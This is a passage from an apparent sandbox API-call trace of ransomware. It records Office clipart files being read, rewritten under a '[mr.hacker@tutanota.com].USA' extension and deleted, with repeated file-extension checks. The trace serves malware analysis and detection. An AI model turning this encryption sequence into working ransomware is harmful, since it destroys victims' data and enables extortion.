| out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.374] SetEndOfFile (hFile=0x348) returned 1 [0268.374] CloseHandle (hObject=0x348) returned 1 [0268.374] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.374] SetEndOfFile (hFile=0x394) returned 1 [0268.376] CloseHandle (hObject=0x394) returned 1 [0268.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0268.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.384] lstrlenW (lpString=".doc") returned 4 [0268.384] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.384] lstrlenW (lpString=".docx") returned 5 [0268.384] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.384] lstrlenW (lpString=".pdf") returned 4 [0268.384] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.384] lstrlenW (lpString=".xls") returned 4 [0268.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.384] lstrlenW (lpString=".xlsx") returned 5 [0268.384] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.384] lstrlenW (lpString=".ppt") returned 4 [0268.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.384] lstrlenW (lpString=".zip") returned 4 [0268.384] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.384] lstrlenW (lpString=".rar") returned 4 [0268.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString=".bz2") returned 4 [0268.385] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString=".7z") returned 3 [0268.385] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.385] lstrlenW (lpString=".dbf") returned 4 [0268.385] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.385] lstrlenW (lpString=".1cd") returned 4 [0268.385] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.385] lstrlenW (lpString=".jpg") returned 4 [0268.385] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.385] lstrlenW (lpString=".doc") returned 4 [0268.385] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString=".docx") returned 5 [0268.385] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.385] lstrlenW (lpString=".pdf") returned 4 [0268.385] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.385] lstrlenW (lpString=".xls") returned 4 [0268.385] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.385] lstrlenW (lpString=".xlsx") returned 5 [0268.385] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.385] lstrlenW (lpString=".ppt") returned 4 [0268.386] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.386] lstrlenW (lpString=".zip") returned 4 [0268.386] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.386] lstrlenW (lpString=".rar") returned 4 [0268.386] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.386] lstrlenW (lpString=".bz2") returned 4 [0268.386] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.386] lstrlenW (lpString=".7z") returned 3 [0268.386] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.386] lstrlenW (lpString=".dbf") returned 4 [0268.386] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.386] lstrlenW (lpString=".1cd") returned 4 [0268.386] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 63 [0268.386] lstrlenW (lpString=".jpg") returned 4 [0268.386] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.386] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.386] lstrlenW (lpString="DD00372_.WMF") returned 12 [0268.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0268.451] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=792) returned 1 [0268.451] CloseHandle (hObject=0x3a4) returned 1 [0268.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 0x20 [0268.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.688] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.688] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.896] GetLastError () returned 0x0 [0268.896] ReadFile (in: hFile=0x2b4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x318, lpOverlapped=0x0) returned 1 [0269.054] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x320, lpOverlapped=0x0) returned 1 [0269.054] ReadFile (in: hFile=0x2b4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.054] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.054] SetEndOfFile (hFile=0x390) returned 1 [0269.055] CloseHandle (hObject=0x390) returned 1 [0269.055] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.055] SetEndOfFile (hFile=0x2b4) returned 1 [0269.056] CloseHandle (hObject=0x2b4) returned 1 [0269.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0269.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.057] lstrlenW (lpString=".doc") returned 4 [0269.057] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.057] lstrlenW (lpString=".docx") returned 5 [0269.057] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.057] lstrlenW (lpString=".pdf") returned 4 [0269.057] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.057] lstrlenW (lpString=".xls") returned 4 [0269.057] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.057] lstrlenW (lpString=".xlsx") returned 5 [0269.057] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.057] lstrlenW (lpString=".ppt") returned 4 [0269.057] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.057] lstrlenW (lpString=".zip") returned 4 [0269.058] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.058] lstrlenW (lpString=".rar") returned 4 [0269.058] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString=".bz2") returned 4 [0269.058] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString=".7z") returned 3 [0269.058] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.058] lstrlenW (lpString=".dbf") returned 4 [0269.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.058] lstrlenW (lpString=".1cd") returned 4 [0269.058] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.058] lstrlenW (lpString=".jpg") returned 4 [0269.058] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.058] lstrlenW (lpString=".doc") returned 4 [0269.058] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString=".docx") returned 5 [0269.058] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.058] lstrlenW (lpString=".pdf") returned 4 [0269.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.058] lstrlenW (lpString=".xls") returned 4 [0269.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.058] lstrlenW (lpString=".xlsx") returned 5 [0269.058] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.058] lstrlenW (lpString=".ppt") returned 4 [0269.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.059] lstrlenW (lpString=".zip") returned 4 [0269.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.059] lstrlenW (lpString=".rar") returned 4 [0269.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.059] lstrlenW (lpString=".bz2") returned 4 [0269.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.059] lstrlenW (lpString=".7z") returned 3 [0269.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.059] lstrlenW (lpString=".dbf") returned 4 [0269.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.059] lstrlenW (lpString=".1cd") returned 4 [0269.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 63 [0269.059] lstrlenW (lpString=".jpg") returned 4 [0269.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.059] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.060] lstrlenW (lpString="DD00705_.WMF") returned 12 [0269.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.060] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=24588) returned 1 [0269.060] CloseHandle (hObject=0x2b4) returned 1 [0269.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 0x20 [0269.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.060] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.060] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.061] GetLastError () returned 0x0 [0269.061] ReadFile (in: hFile=0x2b4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x600c, lpOverlapped=0x0) returned 1 [0269.064] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x6010, lpOverlapped=0x0) returned 1 [0269.066] ReadFile (in: hFile=0x2b4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.066] WriteFile (in: hFile=0x390, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.066] SetEndOfFile (hFile=0x390) returned 1 [0269.066] CloseHandle (hObject=0x390) returned 1 [0269.066] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.066] SetEndOfFile (hFile=0x2b4) returned 1 [0269.069] CloseHandle (hObject=0x2b4) returned 1 [0269.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 [0269.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.074] lstrlenW (lpString=".doc") returned 4 [0269.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.074] lstrlenW (lpString=".docx") returned 5 [0269.074] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.074] lstrlenW (lpString=".pdf") returned 4 [0269.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.074] lstrlenW (lpString=".xls") returned 4 [0269.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.074] lstrlenW (lpString=".xlsx") returned 5 [0269.074] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.074] lstrlenW (lpString=".ppt") returned 4 [0269.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.074] lstrlenW (lpString=".zip") returned 4 [0269.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.074] lstrlenW (lpString=".rar") returned 4 [0269.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.074] lstrlenW (lpString=".bz2") returned 4 [0269.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString=".7z") returned 3 [0269.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString=".dbf") returned 4 [0269.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString=".1cd") returned 4 [0269.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString=".jpg") returned 4 [0269.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString=".doc") returned 4 [0269.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString=".docx") returned 5 [0269.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.075] lstrlenW (lpString=".pdf") returned 4 [0269.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString=".xls") returned 4 [0269.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.075] lstrlenW (lpString=".xlsx") returned 5 [0269.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.075] lstrlenW (lpString=".ppt") returned 4 [0269.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.075] lstrlenW (lpString=".zip") returned 4 [0269.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.076] lstrlenW (lpString=".rar") returned 4 [0269.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.076] lstrlenW (lpString=".bz2") returned 4 [0269.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.076] lstrlenW (lpString=".7z") returned 3 [0269.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.076] lstrlenW (lpString=".dbf") returned 4 [0269.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.076] lstrlenW (lpString=".1cd") returned 4 [0269.076] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0269.076] lstrlenW (lpString=".jpg") returned 4 [0269.076] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.076] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.076] lstrlenW (lpString="DD01015_.WMF") returned 12 [0269.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.077] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2226) returned 1 [0269.077] CloseHandle (hObject=0x390) returned 1 [0269.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 0x20 [0269.077] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.077] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.077] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0269.077] GetLastError () returned 0x0 [0269.077] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8b2, lpOverlapped=0x0) returned 1 [0269.090] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0269.091] ReadFile (in: hFile=0x390, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.091] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.091] SetEndOfFile (hFile=0x3a0) returned 1 [0269.091] CloseHandle (hObject=0x3a0) returned 1 [0269.091] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.091] SetEndOfFile (hFile=0x390) returned 1 [0269.093] CloseHandle (hObject=0x390) returned 1 [0269.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 